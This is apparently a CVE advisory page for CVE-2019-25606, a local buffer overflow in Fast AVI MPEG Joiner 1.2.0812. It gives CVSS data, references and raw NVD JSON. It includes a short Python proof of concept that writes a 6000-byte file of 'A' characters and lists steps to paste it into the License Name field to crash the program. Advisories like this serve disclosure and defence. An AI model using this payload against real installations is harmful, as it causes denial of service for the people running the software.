CVE-2019-25606

Description

Fast AVI MPEG Joiner 1.2.0812 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized payload in the License Name field. Attackers can create a malicious text file containing 6000 bytes of data and paste it into the License Name input field to trigger a denial of service condition when the Register button is clicked.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Fast AVI MPEG Joiner 1.2.0812

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Generate the malicious payload
# The vulnerability is triggered by 6000 bytes in the License Name field.
payload = b"A" * 6000

try:
    # Create the malicious file containing the payload
    with open("malicious_license_name.txt", "wb") as f:
        f.write(payload)
    print("[+] File 'malicious_license_name.txt' created successfully.")
    print("[+] Steps to reproduce:")
    print("1. Open Fast AVI MPEG Joiner 1.2.0812")
    print("2. Go to the Register/Help -> Enter License menu")
    print("3. Open 'malicious_license_name.txt' and copy all content")
    print("4. Paste the content into the 'License Name' field")
    print("5. Click the 'Register' button")
    print("[+] Application should crash.")
except Exception as e:
    print(f"[-] Error creating file: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25606
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25606
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25606/
[4] VulDB https://vuldb.com/cve/CVE-2019-25606
[5] http://www.alloksoft.com
[6] http://www.alloksoft.com/fast_avimpegjoiner.exe
[7] https://www.exploit-db.com/exploits/46929
[8] https://www.vulncheck.com/advisories/fast-avi-mpeg-joiner-buffer-overflow-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25606", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:28.433", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fast AVI MPEG Joiner 1.2.0812 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized payload in the License Name field. Attackers can create a malicious text file containing 6000 bytes of data and paste it into the License Name input field to trigger a denial of service condition when the Register button is clicked."}, {"lang": "es", "value": "Fast AVI MPEG Joiner 1.2.0812 contiene una vulnerabilidad de desbordamiento de búfer que permite a atacantes locales bloquear la aplicación al proporcionar una carga útil sobredimensionada en el campo License Name. Los atacantes pueden crear un archivo de texto malicioso que contenga 6000 bytes de datos y pegarlo en el campo de entrada License Name para desencadenar una condición de denegación de servicio cuando se hace clic en el botón Register."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://www.alloksoft.com", "source": "[email protected]"}, {"url": "http://www.alloksoft.com/fast_avimpegjoiner.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46929", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/fast-avi-mpeg-joiner-buffer-overflow-denial-of-service", "source": "[email protected]"}]}}